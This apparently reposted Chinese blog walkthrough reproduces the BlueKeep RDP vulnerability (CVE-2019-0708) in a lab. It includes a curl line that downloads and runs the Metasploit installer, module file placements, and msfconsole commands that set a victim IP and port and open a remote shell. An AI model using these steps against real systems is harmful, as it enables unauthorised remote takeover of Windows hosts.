CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

Posted 0daybug

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现相关的知识,希望对你有一定的参考价值。

0x01

2019年9月7日凌晨,msf上更新了0708的漏洞利用程序。

顿时安全群和朋友圈就爆炸了

-

奈何接到HW攻击队任务,又在家过了个中秋,0708才在今天更新。

0x02 环境

Windows 7 sp1

Kali

exp

0x02 利用

1.一键安装metasploit-framework

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

2.下载Reference中的攻击套件放置文件到msf的相应文件夹

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

msf命令:

使用msfconsole进入metasploit-framework ,reload_all重新加载0708rdp利用模块

技术图片

 

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块

技术图片

 

使用set RHOSTS 设置受害机IP

技术图片

 

使用set RPORT 设置受害机RDP端口号

技术图片

 

使用set target ID数字(可选为0-4)设置受害机机器架构

我使用的是Parallels Desktop,设置target 1

技术图片

 

使用exploit开始攻击,等待建立连接

技术图片

 

建立连接以后,使用shell获得shell,再使用python获得交互式shell,执行whoami

技术图片

 

以上是关于CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

Microsoft Windows 远程桌面服务远程执行代码漏洞(CVE-2019-0708)

cve-2019-0708 远程桌面代码执行漏洞复现

cve-2019-0708--(远程桌面服务远程执行代码漏洞)拿下win7权限

cve-2019-0708复现及经验总结

CVE-2019-0708蠕虫级漏洞利用

CVE-2019-0708蠕虫级漏洞利用